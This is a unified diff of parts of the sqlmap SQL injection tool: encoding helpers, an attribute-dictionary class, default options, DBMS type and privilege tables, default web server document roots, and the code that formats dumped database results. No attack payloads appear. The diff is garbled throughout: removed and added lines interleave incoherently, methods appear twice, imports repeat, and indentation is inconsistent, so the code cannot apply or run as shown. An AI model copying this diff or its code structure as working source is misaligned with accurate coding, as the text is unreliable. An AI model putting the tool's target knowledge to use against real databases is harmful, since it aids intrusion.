            retVal = value.encode(UNICODE_ENCODING, "replace")
    return retVal
 def utf8encode(value):
    """
    Returns 8-bit string representation of the supplied UTF-8 value
    >>> utf8encode(u'foobar')
    'foobar'
    """
    return unicodeencode(value, "utf-8")
 def utf8decode(value):
    """
    Returns UTF-8 representation of the supplied 8-bit string representation
    >>> utf8decode('foobar')
    u'foobar'
    """
    return value.decode("utf-8")
 def htmlunescape(value):
    """
    Returns (basic conversion) HTML unescaped value
    >>> htmlunescape('a&lt;b')
    'a<b'
    """
    retVal = value
    if value and isinstance(value, basestring):
        codes = (('&lt;', '<'), ('&gt;', '>'), ('&quot;', '"'), ('&nbsp;', ' '), ('&amp;', '&'))
        retVal = reduce(lambda x, y: x.replace(y[0], y[1]), codes, retVal)
        try:
            retVal = re.sub(r"&#x([^ ;]+);", lambda match: unichr(int(match.group(1), 16)), retVal)
        except ValueError:
            pass
    return retVal
 def singleTimeWarnMessage(message):  # Cross-linked function
    sys.stdout.write(message)
    sys.stdout.write("\n")
    sys.stdout.flush()
 def stdoutencode(data):
    retVal = None
    try:
        data = data or ""
        # Reference: http://bugs.python.org/issue1602
        if IS_WIN:
            output = data.encode(sys.stdout.encoding, "replace")
            if '?' in output and '?' not in data:
                warnMsg = "cannot properly display Unicode characters "
                warnMsg += "inside Windows OS command prompt "
                warnMsg += "(http://bugs.python.org/issue1602). All "
                warnMsg += "unhandled occurances will result in "
                warnMsg += "replacement with '?' character. Please, find "
                warnMsg += "proper character representation inside "
                warnMsg += "corresponding output files. "
                singleTimeWarnMessage(warnMsg)
            retVal = output
        else:
            retVal = data.encode(sys.stdout.encoding)
    except:
        retVal = data.encode(UNICODE_ENCODING) if isinstance(data, unicode) else data
    return retVal
 def jsonize(data):
    """
    Returns JSON serialized data
    >>> jsonize({'foo':'bar'})
    '{\\n    "foo": "bar"\\n}'
    """
    return json.dumps(data, sort_keys=False, indent=4)
 def dejsonize(data):
    """
    Returns JSON deserialized data
    >>> dejsonize('{\\n    "foo": "bar"\\n}')
    {u'foo': u'bar'}
    """
    return json.loads(data)
--- a/lib/core/data.py
+++ b/lib/core/data.py
@@ -1,45 +1,28 @@
 #!/usr/bin/env python
 """
-$Id$
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
-
+See the file 'doc/COPYING' for copying permission
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
                        and Daniele Bellucci <daniele.bellucci@gmail.com>
 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 Software Foundation version 2 of the License.
 sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
 WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
 FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
 details.
 You should have received a copy of the GNU General Public License along
 with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
-
+from lib.core.datatype import AttribDict
-
+from lib.core.log import LOGGER
 from lib.core.datatype import advancedDict
 from lib.core.settings import LOGGER
 # sqlmap paths
-paths = advancedDict()
+paths = AttribDict()
 # object to store original command line options
 cmdLineOptions = AttribDict()
 # object to store merged options (command line, configuration file and default options)
 mergedOptions = AttribDict()
 # object to share within function and classes command
 # line options and settings
-conf = advancedDict()
+conf = AttribDict()
 # object to share within function and classes results
-kb = advancedDict()
+kb = AttribDict()
 # object to share within function and classes temporary data,
 # just for internal use
 temp = advancedDict()
 # object with each database management system specific queries
 queries = {}
--- a/lib/core/datatype.py
+++ b/lib/core/datatype.py
@@ -1,35 +1,22 @@
 #!/usr/bin/env python
 """
-$Id$
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
-
+See the file 'doc/COPYING' for copying permission
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
                        and Daniele Bellucci <daniele.bellucci@gmail.com>
 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 Software Foundation version 2 of the License.
 sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
 WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
 FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
 details.
 You should have received a copy of the GNU General Public License along
 with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
 import copy
 import types
-from lib.core.exception import sqlmapDataException
+class AttribDict(dict):
 class advancedDict(dict):
    """
    This class defines the sqlmap object, inheriting from Python data
    type dictionary.
    >>> foo = AttribDict()
    >>> foo.bar = 1
    >>> foo.bar
    1
    """
    def __init__(self, indict=None, attribute=None):
@@ -45,7 +32,6 @@ class advancedDict(dict):
        # After initialisation, setting attributes
        # is the same as setting an item
    def __getattr__(self, item):
        """
        Maps values to attributes
@@ -55,8 +41,7 @@ class advancedDict(dict):
        try:
            return self.__getitem__(item)
        except KeyError:
-            raise sqlmapDataException, "Unable to access item '%s'" % item
+            raise AttributeError("unable to access item '%s'" % item)
    def __setattr__(self, item, value):
        """
@@ -65,13 +50,57 @@ class advancedDict(dict):
        """
        # This test allows attributes to be set in the __init__ method
-        if not self.__dict__.has_key('_advancedDict__initialised'):
+        if "_AttribDict__initialised" not in self.__dict__:
            return dict.__setattr__(self, item, value)
        # Any normal attributes are handled normally
-        elif self.__dict__.has_key(item):
+        elif item in self.__dict__:
            dict.__setattr__(self, item, value)
        else:
            self.__setitem__(item, value)
    def __getstate__(self):
        return self.__dict__
    def __setstate__(self, dict):
        self.__dict__ = dict
    def __deepcopy__(self, memo):
        retVal = self.__class__()
        memo[id(self)] = retVal
        for attr in dir(self):
            if not attr.startswith('_'):
                value = getattr(self, attr)
                if not isinstance(value, (types.BuiltinFunctionType, types.FunctionType, types.MethodType)):
                    setattr(retVal, attr, copy.deepcopy(value, memo))
        for key, value in self.items():
            retVal.__setitem__(key, copy.deepcopy(value, memo))
        return retVal
 class InjectionDict(AttribDict):
    def __init__(self):
        AttribDict.__init__(self)
        self.place = None
        self.parameter = None
        self.ptype = None
        self.prefix = None
        self.suffix = None
        self.clause = None
        self.notes = []  # Note: https://github.com/sqlmapproject/sqlmap/issues/1888
        # data is a dict with various stype, each which is a dict with
        # all the information specific for that stype
        self.data = AttribDict()
        # conf is a dict which stores current snapshot of important
        # options used during detection
        self.conf = AttribDict()
        self.dbms = None
        self.dbms_version = None
        self.os = None
--- a/lib/core/decorators.py
+++ b/lib/core/decorators.py
@@ -0,0 +1,27 @@
 #!/usr/bin/env python
 """
 Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 def cachedmethod(f, cache={}):
    """
    Method with a cached content
    Reference: http://code.activestate.com/recipes/325205-cache-decorator-in-python-24/
    """
    def _(*args, **kwargs):
        try:
            key = (f, tuple(args), frozenset(kwargs.items()))
            if key not in cache:
                cache[key] = f(*args, **kwargs)
        except:
            key = "".join(str(_) for _ in (f, args, kwargs))
            if key not in cache:
                cache[key] = f(*args, **kwargs)
        return cache[key]
    return _
--- a/lib/core/defaults.py
+++ b/lib/core/defaults.py
@@ -0,0 +1,27 @@
 #!/usr/bin/env python
 """
 Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 from lib.core.datatype import AttribDict
 _defaults = {
   "csvDel":       ",",
   "timeSec":      5,
   "googlePage":   1,
   "verbose":      1,
   "delay":        0,
   "timeout":      30,
   "retries":      3,
   "saFreq":       0,
   "threads":      1,
   "level":        1,
   "risk":         1,
   "dumpFormat":   "CSV",
   "tech":         "BEUSTQ",
   "torType":      "HTTP",
 }
 defaults = AttribDict(_defaults)
--- a/lib/core/dicts.py
+++ b/lib/core/dicts.py
@@ -0,0 +1,239 @@
 #!/usr/bin/env python
 """
 Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
 See the file 'doc/COPYING' for copying permission
 """
 from lib.core.enums import DBMS
 from lib.core.enums import OS
 from lib.core.enums import POST_HINT
 from lib.core.settings import BLANK
 from lib.core.settings import NULL
 from lib.core.settings import MSSQL_ALIASES
 from lib.core.settings import MYSQL_ALIASES
 from lib.core.settings import PGSQL_ALIASES
 from lib.core.settings import ORACLE_ALIASES
 from lib.core.settings import SQLITE_ALIASES
 from lib.core.settings import ACCESS_ALIASES
 from lib.core.settings import FIREBIRD_ALIASES
 from lib.core.settings import MAXDB_ALIASES
 from lib.core.settings import SYBASE_ALIASES
 from lib.core.settings import DB2_ALIASES
 from lib.core.settings import HSQLDB_ALIASES
 FIREBIRD_TYPES = {
                    261: "BLOB",
                    14: "CHAR",
                    40: "CSTRING",
                    11: "D_FLOAT",
                    27: "DOUBLE",
                    10: "FLOAT",
                    16: "INT64",
                    8: "INTEGER",
                    9: "QUAD",
                    7: "SMALLINT",
                    12: "DATE",
                    13: "TIME",
                    35: "TIMESTAMP",
                    37: "VARCHAR",
                }
 SYBASE_TYPES = {
                    14: "floatn",
                    8: "float",
                    15: "datetimn",
                    12: "datetime",
                    23: "real",
                    28: "numericn",
                    10: "numeric",
                    27: "decimaln",
                    26: "decimal",
                    17: "moneyn",
                    11: "money",
                    21: "smallmoney",
                    22: "smalldatetime",
                    13: "intn",
                    7: "int",
                    6: "smallint",
                    5: "tinyint",
                    16: "bit",
                    2: "varchar",
                    18: "sysname",
                    25: "nvarchar",
                    1: "char",
                    24: "nchar",
                    4: "varbinary",
                    80: "timestamp",
                    3: "binary",
                    19: "text",
                    20: "image",
                }
 MYSQL_PRIVS = {
                    1: "select_priv",
                    2: "insert_priv",
                    3: "update_priv",
                    4: "delete_priv",
                    5: "create_priv",
                    6: "drop_priv",
                    7: "reload_priv",
                    8: "shutdown_priv",
                    9: "process_priv",
                    10: "file_priv",
                    11: "grant_priv",
                    12: "references_priv",
                    13: "index_priv",
                    14: "alter_priv",
                    15: "show_db_priv",
                    16: "super_priv",
                    17: "create_tmp_table_priv",
                    18: "lock_tables_priv",
                    19: "execute_priv",
                    20: "repl_slave_priv",
                    21: "repl_client_priv",
                    22: "create_view_priv",
                    23: "show_view_priv",
                    24: "create_routine_priv",
                    25: "alter_routine_priv",
                    26: "create_user_priv",
                }
 PGSQL_PRIVS = {
                    1: "createdb",
                    2: "super",
                    3: "catupd",
                }
 # Reference(s): http://stackoverflow.com/a/17672504
 #               http://docwiki.embarcadero.com/InterBase/XE7/en/RDB$USER_PRIVILEGES
 FIREBIRD_PRIVS = {
                    "S": "SELECT",
                    "I": "INSERT",
                    "U": "UPDATE",
                    "D": "DELETE",
                    "R": "REFERENCE",
                    "E": "EXECUTE",
                    "X": "EXECUTE",
                    "A": "ALL",
                    "M": "MEMBER",
                    "T": "DECRYPT",
                    "E": "ENCRYPT",
                    "B": "SUBSCRIBE",
                }
 DB2_PRIVS = {
                    1: "CONTROLAUTH",
                    2: "ALTERAUTH",
                    3: "DELETEAUTH",
                    4: "INDEXAUTH",
                    5: "INSERTAUTH",
                    6: "REFAUTH",
                    7: "SELECTAUTH",
                    8: "UPDATEAUTH",
           }
 DUMP_REPLACEMENTS = {" ": NULL, "": BLANK}
 DBMS_DICT = {
                DBMS.MSSQL: (MSSQL_ALIASES, "python-pymssql", "http://pymssql.sourceforge.net/", "mssql+pymssql"),
                DBMS.MYSQL: (MYSQL_ALIASES, "python pymysql", "https://github.com/petehunt/PyMySQL/", "mysql"),
                DBMS.PGSQL: (PGSQL_ALIASES, "python-psycopg2", "http://initd.org/psycopg/", "postgresql"),
                DBMS.ORACLE: (ORACLE_ALIASES, "python cx_Oracle", "http://cx-oracle.sourceforge.net/", "oracle"),
                DBMS.SQLITE: (SQLITE_ALIASES, "python-sqlite", "http://packages.ubuntu.com/quantal/python-sqlite", "sqlite"),
                DBMS.ACCESS: (ACCESS_ALIASES, "python-pyodbc", "http://pyodbc.googlecode.com/", "access"),
                DBMS.FIREBIRD: (FIREBIRD_ALIASES, "python-kinterbasdb", "http://kinterbasdb.sourceforge.net/", "firebird"),
                DBMS.MAXDB: (MAXDB_ALIASES, None, None, "maxdb"),
                DBMS.SYBASE: (SYBASE_ALIASES, "python-pymssql", "http://pymssql.sourceforge.net/", "sybase"),
                DBMS.DB2: (DB2_ALIASES, "python ibm-db", "http://code.google.com/p/ibm-db/", "ibm_db_sa"),
                DBMS.HSQLDB: (HSQLDB_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/", None),
            }
 FROM_DUMMY_TABLE = {
                        DBMS.ORACLE: " FROM DUAL",
                        DBMS.ACCESS: " FROM MSysAccessObjects",
                        DBMS.FIREBIRD: " FROM RDB$DATABASE",
                        DBMS.MAXDB: " FROM VERSIONS",
                        DBMS.DB2: " FROM SYSIBM.SYSDUMMY1",
                        DBMS.HSQLDB: " FROM INFORMATION_SCHEMA.SYSTEM_USERS"
                   }
 SQL_STATEMENTS = {
                        "SQL SELECT statement":  (
                             "select ",
                             "show ",
                             " top ",
                             " distinct ",
                             " from ",
                             " from dual",
                             " where ",
                             " group by ",
                             " order by ",
                             " having ",
                             " limit ",
                             " offset ",
                             " union all ",
                             " rownum as ",
                             "(case ",           ),
                         "SQL data definition":  (
                             "create ",
                             "declare ",
                             "drop ",
                             "truncate ",
                             "alter ",           ),
                        "SQL data manipulation": (
                             "bulk ",
                             "insert ",
                             "update ",
                             "delete ",
                             "merge ",
                             "load ",            ),
                        "SQL data control":      (
                             "grant ",
                             "revoke ",          ),
                        "SQL data execution":    (
                             "exec ",
                             "execute ",
                             "values ", 
                             "call ",            ),
                        "SQL transaction":       (
                             "start transaction ",
                             "begin work ",
                             "begin transaction ",
                             "commit ",
                             "rollback ",        ),
                     }
 POST_HINT_CONTENT_TYPES = {
                                POST_HINT.JSON: "application/json",
                                POST_HINT.JSON_LIKE: "application/json",
                                POST_HINT.MULTIPART: "multipart/form-data",
                                POST_HINT.SOAP: "application/soap+xml",
                                POST_HINT.XML: "application/xml",
                                POST_HINT.ARRAY_LIKE: "application/x-www-form-urlencoded; charset=utf-8",
                          }
 DEPRECATED_OPTIONS = {
                        "--replicate": "use '--dump-format=SQLITE' instead",
                        "--no-unescape": "use '--no-escape' instead",
                        "--binary": "use '--binary-fields' instead",
                        "--auth-private": "use '--auth-file' instead",
                        "--check-payload": None,
                        "--check-waf": None,
                     }
 DUMP_DATA_PREPROCESS = {
                            DBMS.ORACLE: {"XMLTYPE": "(%s).getStringVal()"},  # Reference: https://www.tibcommunity.com/docs/DOC-3643
                            DBMS.MSSQL: {"IMAGE": "CONVERT(VARBINARY(MAX),%s)"},
                       }
 DEFAULT_DOC_ROOTS = {
                        OS.WINDOWS: ("C:/xampp/htdocs/", "C:/wamp/www/", "C:/Inetpub/wwwroot/"),
                        OS.LINUX: ("/var/www/", "/var/www/html", "/usr/local/apache2/htdocs", "/var/www/nginx-default", "/srv/www")  # Reference: https://wiki.apache.org/httpd/DistrosDefaultLayout
                    }
--- a/lib/core/dump.py
+++ b/lib/core/dump.py
@@ -1,173 +1,272 @@
 #!/usr/bin/env python
 """
-$Id$
+Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/)
-
+See the file 'doc/COPYING' for copying permission
 This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
 Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
                        and Daniele Bellucci <daniele.bellucci@gmail.com>
 sqlmap is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 Software Foundation version 2 of the License.
 sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
 WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
 FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
 details.
 You should have received a copy of the GNU General Public License along
 with sqlmap; if not, write to the Free Software Foundation, Inc., 51
 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
 """
-
+import cgi
-
+import hashlib
 import re
 import os
 import re
 import tempfile
 import threading
 from lib.core.common import Backend
 from lib.core.common import checkFile
 from lib.core.common import dataToDumpFile
-from lib.core.common import filePathToString
+from lib.core.common import dataToStdout
 from lib.core.common import getSafeExString
 from lib.core.common import getUnicode
 from lib.core.common import isListLike
 from lib.core.common import normalizeUnicode
 from lib.core.common import openFile
 from lib.core.common import prioritySortColumns
 from lib.core.common import randomInt
 from lib.core.common import safeCSValue
 from lib.core.common import unicodeencode
 from lib.core.common import unsafeSQLIdentificatorNaming
 from lib.core.data import conf
 from lib.core.data import kb
 from lib.core.data import logger
 from lib.core.dicts import DUMP_REPLACEMENTS
 from lib.core.enums import CONTENT_STATUS
 from lib.core.enums import CONTENT_TYPE
 from lib.core.enums import DBMS
 from lib.core.enums import DUMP_FORMAT
 from lib.core.exception import SqlmapGenericException
 from lib.core.exception import SqlmapValueException
 from lib.core.exception import SqlmapSystemException
 from lib.core.replication import Replication
 from lib.core.settings import DUMP_FILE_BUFFER_SIZE
 from lib.core.settings import HTML_DUMP_CSS_STYLE
 from lib.core.settings import IS_WIN
 from lib.core.settings import METADB_SUFFIX
 from lib.core.settings import MIN_BINARY_DISK_DUMP_SIZE
 from lib.core.settings import TRIM_STDOUT_DUMP_SIZE
 from lib.core.settings import UNICODE_ENCODING
 from lib.core.settings import WINDOWS_RESERVED_NAMES
 from thirdparty.magic import magic
 from extra.safe2bin.safe2bin import safechardecode
-class Dump:
+class Dump(object):
    """
    This class defines methods used to parse and output the results
    of SQL injection actions
    """
    def __init__(self):
-        self.__outputFile = None
+        self._outputFile = None
-        self.__outputFP   = None
+        self._outputFP = None
-
+        self._lock = threading.Lock()
    def __write(self, data, n=True, rFile=False):
        if n:
            print data
            self.__outputFP.write("%s\n" % data)
            # TODO: do not duplicate queries output in the text file, check
            # before if the data is already within the text file content
            if rFile and conf.rFile:
                rFile = filePathToString(conf.rFile)
                rFileFP = open("%s%s%s" % (conf.filePath, os.sep, rFile), "w")
                rFileFP.write(data)
                rFileFP.close()
        else:
            print data,
            self.__outputFP.write("%s " % data)
        self.__outputFP.flush()
        conf.loggedToOut = True
    def setOutputFile(self):
        self.__outputFile = "%s%slog" % (conf.outputPath, os.sep)
        self.__outputFP = open(self.__outputFile, "a")
    def string(self, header, data):
        if isinstance(data, (list, tuple, set)):
            self.lister(header, data)
    def _write(self, data, newline=True, console=True, content_type=None):
        if hasattr(conf, "api"):
            dataToStdout(data, content_type=content_type, status=CONTENT_STATUS.COMPLETE)
            return
-        if data:
+        text = "%s%s" % (data, "\n" if newline else " ")
            data = data.replace("__NEWLINE__", "\n").replace("__TAB__", "\t")
            data = data.replace("__START__", "").replace("__STOP__", "")
            data = data.replace("__DEL__", ", ")
-            if "\n" in data:
+        if console:
-                self.__write("%s:\n---\n%s---\n" % (header, data), rFile=header)
+            dataToStdout(text)
        if kb.get("multiThreadMode"):
            self._lock.acquire()
        try:
            self._outputFP.write(text)
        except IOError, ex:
            errMsg = "error occurred while writing to log file ('%s')" % getSafeExString(ex)
            raise SqlmapGenericException(errMsg)
        if kb.get("multiThreadMode"):
            self._lock.release()
        kb.dataOutputFlag = True
    def flush(self):
        if self._outputFP:
            try:
                self._outputFP.flush()
            except IOError:
                pass
    def setOutputFile(self):
        self._outputFile = os.path.join(conf.outputPath, "log")
        try:
            self._outputFP = openFile(self._outputFile, "ab" if not conf.flushSession else "wb")
        except IOError, ex:
            errMsg = "error occurred while opening log file ('%s')" % getSafeExString(ex)
            raise SqlmapGenericException(errMsg)
    def getOutputFile(self):
        return self._outputFile
    def singleString(self, data, content_type=None):
        self._write(data, content_type=content_type)
    def string(self, header, data, content_type=None, sort=True):
        kb.stickyLevel = None
        if hasattr(conf, "api"):
            self._write(data, content_type=content_type)
            return
        if isListLike(data):
            self.lister(header, data, content_type, sort)
        elif data is not None:
            _ = getUnicode(data)
            if _ and _[-1] == '\n':
                _ = _[:-1]
            if "\n" in _:
                self._write("%s:\n---\n%s\n---" % (header, _))
            else:
-                self.__write("%s:    '%s'\n" % (header, data))
+                self._write("%s:    %s" % (header, ("'%s'" % _) if isinstance(data, basestring) else _))
        else:
-            self.__write("%s:\tNone\n" % header)
+            self._write("%s:\tNone" % header)
    def lister(self, header, elements):
        if elements:
            self.__write("%s [%d]:" % (header, len(elements)))
    def lister(self, header, elements, content_type=None, sort=True):
        if elements and sort:
            try:
                elements = set(elements)
                elements = list(elements)
-            elements.sort(key=lambda x: x.lower())
+                elements.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x)
            except:
                pass
-        for element in elements:
+        if hasattr(conf, "api"):
-            if isinstance(element, str):
+            self._write(elements, content_type=content_type)
-                self.__write("[*] %s" % element)
+            return
            elif isinstance(element, (list, tuple, set)):
                self.__write("[*] " + ", ".join(e for e in element))
        if elements:
-            self.__write("")
+            self._write("%s [%d]:" % (header, len(elements)))
        for element in elements:
            if isinstance(element, basestring):
                self._write("[*] %s" % element)
            elif isListLike(element):
                self._write("[*] " + ", ".join(getUnicode(e) for e in element))
-    def userSettings(self, header, userSettings, subHeader):
+        if elements:
-        self.__areAdmins = set()
+            self._write("")
-        if userSettings:
+    def banner(self, data):
-            self.__write("%s:" % header)
+        self.string("banner", data, content_type=CONTENT_TYPE.BANNER)
    def currentUser(self, data):
        self.string("current user", data, content_type=CONTENT_TYPE.CURRENT_USER)
    def currentDb(self, data):
        if Backend.isDbms(DBMS.MAXDB):
            self.string("current database (no practical usage on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB)
        elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.PGSQL, DBMS.HSQLDB):
            self.string("current schema (equivalent to database on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB)
        else:
            self.string("current database", data, content_type=CONTENT_TYPE.CURRENT_DB)
    def hostname(self, data):
        self.string("hostname", data, content_type=CONTENT_TYPE.HOSTNAME)
    def dba(self, data):
        self.string("current user is DBA", data, content_type=CONTENT_TYPE.IS_DBA)
    def users(self, users):
        self.lister("database management system users", users, content_type=CONTENT_TYPE.USERS)
    def userSettings(self, header, userSettings, subHeader, content_type=None):
        self._areAdmins = set()
        if isinstance(userSettings, (tuple, list, set)):
-            self.__areAdmins = userSettings[1]
+            self._areAdmins = userSettings[1]
            userSettings = userSettings[0]
        users = userSettings.keys()
-        users.sort(key=lambda x: x.lower())
+        users.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x)
        if hasattr(conf, "api"):
            self._write(userSettings, content_type=content_type)
            return
        if userSettings:
            self._write("%s:" % header)
        for user in users:
            settings = userSettings[user]
-            if user in self.__areAdmins:
+            if settings is None:
-                self.__write("[*] %s (administrator) [%d]:" % (user, len(settings)))
+                stringSettings = ""
            else:
-                self.__write("[*] %s [%d]:" % (user, len(settings)))
+                stringSettings = " [%d]:" % len(settings)
            if user in self._areAdmins:
                self._write("[*] %s (administrator)%s" % (user, stringSettings))
            else:
                self._write("[*] %s%s" % (user, stringSettings))
            if settings:
                settings.sort()
                for setting in settings:
-                self.__write("    %s: %s" % (subHeader, setting))
+                    self._write("    %s: %s" % (subHeader, setting))
        print
        if userSettings:
            self.singleString("")
    def dbs(self, dbs):
        self.lister("available databases", dbs, content_type=CONTENT_TYPE.DBS)
    def dbTables(self, dbTables):
        if isinstance(dbTables, dict) and len(dbTables) > 0:
            if hasattr(conf, "api"):
                self._write(dbTables, content_type=CONTENT_TYPE.TABLES)
                return
            maxlength = 0
            for tables in dbTables.values():
                for table in tables:
-                maxlength = max(maxlength, len(table))
+                    if table and isListLike(table):
                        table = table[0]
                    maxlength = max(maxlength, len(unsafeSQLIdentificatorNaming(normalizeUnicode(table) or unicode(table))))
            lines = "-" * (int(maxlength) + 2)
            for db, tables in dbTables.items():
-            tables.sort(key=lambda x: x.lower())
+                tables.sort()
-            self.__write("Database: %s" % db)
+                self._write("Database: %s" % unsafeSQLIdentificatorNaming(db) if db else "Current database")
                if len(tables) == 1:
-                self.__write("[1 table]")
+                    self._write("[1 table]")
                else:
-                self.__write("[%d tables]" % len(tables))
+                    self._write("[%d tables]" % len(tables))
-            self.__write("+%s+" % lines)
+                self._write("+%s+" % lines)
                for table in tables:
-                blank = " " * (maxlength - len(table))
+                    if table and isListLike(table):
-                self.__write("| %s%s |" % (table, blank))
+                        table = table[0]
-            self.__write("+%s+\n" % lines)
+                    table = unsafeSQLIdentificatorNaming(table)
                    blank = " " * (maxlength - len(normalizeUnicode(table) or unicode(table)))
                    self._write("| %s%s |" % (table, blank))
                self._write("+%s+\n" % lines)
        elif dbTables is None or len(dbTables) == 0:
            self.singleString("No tables found", content_type=CONTENT_TYPE.TABLES)
        else:
            self.string("tables", dbTables, content_type=CONTENT_TYPE.TABLES)
    def dbTableColumns(self, tableColumns, content_type=None):
        if isinstance(tableColumns, dict) and len(tableColumns) > 0:
            if hasattr(conf, "api"):
                self._write(tableColumns, content_type=content_type)
                return
    def dbTableColumns(self, tableColumns):
            for db, tables in tableColumns.items():
                if not db:
                    db = "All"
@@ -176,65 +275,194 @@ class Dump:
                    maxlength1 = 0
                    maxlength2 = 0
                    colType = None
                    colList = columns.keys()
-                colList.sort(key=lambda x: x.lower())
+                    colList.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x)
                    for column in colList:
                        colType = columns[column]
-                    maxlength1 = max(maxlength1, len(column))
+
-                    maxlength2 = max(maxlength2, len(colType))
+                        column = unsafeSQLIdentificatorNaming(column)
                        maxlength1 = max(maxlength1, len(column or ""))
                        maxlength2 = max(maxlength2, len(colType or ""))
                    maxlength1 = max(maxlength1, len("COLUMN"))
-                maxlength2 = max(maxlength2, len("TYPE"))
+                    lines1 = "-" * (maxlength1 + 2)
                lines1 = "-" * (int(maxlength1) + 2)
                lines2 = "-" * (int(maxlength2) + 2)
-                self.__write("Database: %s\nTable: %s" % (db, table))
+                    if colType is not None:
                        maxlength2 = max(maxlength2, len("TYPE"))
                        lines2 = "-" * (maxlength2 + 2)
                    self._write("Database: %s\nTable: %s" % (unsafeSQLIdentificatorNaming(db) if db else "Current database", unsafeSQLIdentificatorNaming(table)))
                    if len(columns) == 1:
-                    self.__write("[1 column]")
+                        self._write("[1 column]")
                    else:
-                    self.__write("[%d columns]" % len(columns))
+                        self._write("[%d columns]" % len(columns))
-                self.__write("+%s+%s+" % (lines1, lines2))
+                    if colType is not None:
                        self._write("+%s+%s+" % (lines1, lines2))
                    else:
                        self._write("+%s+" % lines1)
                    blank1 = " " * (maxlength1 - len("COLUMN"))
                    if colType is not None:
                        blank2 = " " * (maxlength2 - len("TYPE"))
-                self.__write("| Column%s | Type%s |" % (blank1, blank2))
+                    if colType is not None:
-                self.__write("+%s+%s+" % (lines1, lines2))
+                        self._write("| Column%s | Type%s |" % (blank1, blank2))
                        self._write("+%s+%s+" % (lines1, lines2))
                    else:
                        self._write("| Column%s |" % blank1)
                        self._write("+%s+" % lines1)
                    for column in colList:
                        colType = columns[column]
                        column = unsafeSQLIdentificatorNaming(column)
                        blank1 = " " * (maxlength1 - len(column))
                        if colType is not None:
                            blank2 = " " * (maxlength2 - len(colType))
-                    self.__write("| %s%s | %s%s |" % (column, blank1, colType, blank2))
+                            self._write("| %s%s | %s%s |" % (column, blank1, colType, blank2))
                        else:
                            self._write("| %s%s |" % (column, blank1))
-                self.__write("+%s+%s+\n" % (lines1, lines2))
+                    if colType is not None:
                        self._write("+%s+%s+\n" % (lines1, lines2))
                    else:
                        self._write("+%s+\n" % lines1)
    def dbTablesCount(self, dbTables):
        if isinstance(dbTables, dict) and len(dbTables) > 0:
            if hasattr(conf, "api"):
                self._write(dbTables, content_type=CONTENT_TYPE.COUNT)
                return
            maxlength1 = len("Table")
            maxlength2 = len("Entries")
            for ctables in dbTables.values():
                for tables in ctables.values():
                    for table in tables:
                        maxlength1 = max(maxlength1, len(normalizeUnicode(table) or unicode(table)))
            for db, counts in dbTables.items():
                self._write("Database: %s" % unsafeSQLIdentificatorNaming(db) if db else "Current database")
                lines1 = "-" * (maxlength1 + 2)
                blank1 = " " * (maxlength1 - len("Table"))
                lines2 = "-" * (maxlength2 + 2)
                blank2 = " " * (maxlength2 - len("Entries"))
                self._write("+%s+%s+" % (lines1, lines2))
                self._write("| Table%s | Entries%s |" % (blank1, blank2))
                self._write("+%s+%s+" % (lines1, lines2))
                sortedCounts = counts.keys()
                sortedCounts.sort(reverse=True)
                for count in sortedCounts:
                    tables = counts[count]
                    if count is None:
                        count = "Unknown"
                    tables.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x)
                    for table in tables:
                        blank1 = " " * (maxlength1 - len(normalizeUnicode(table) or unicode(table)))
                        blank2 = " " * (maxlength2 - len(str(count)))
                        self._write("| %s%s | %d%s |" % (table, blank1, count, blank2))
                self._write("+%s+%s+\n" % (lines1, lines2))
        else:
            logger.error("unable to retrieve the number of entries for any table")
    def dbTableValues(self, tableValues):
        replication = None
        rtable = None
        dumpFP = None
        appendToFile = False
        warnFile = False
        if tableValues is None:
            return
        db = tableValues["__infos__"]["db"]
        if not db:
            db = "All"
        table = tableValues["__infos__"]["table"]
-        if not conf.multipleTargets:
+        if hasattr(conf, "api"):
-            dumpDbPath = "%s%s%s" % (conf.dumpPath, os.sep, db)
+            self._write(tableValues, content_type=CONTENT_TYPE.DUMP_TABLE)
            return
        dumpDbPath = os.path.join(conf.dumpPath, unsafeSQLIdentificatorNaming(db))
        if conf.dumpFormat == DUMP_FORMAT.SQLITE:
            replication = Replication(os.path.join(conf.dumpPath, "%s.sqlite3" % unsafeSQLIdentificatorNaming(db)))
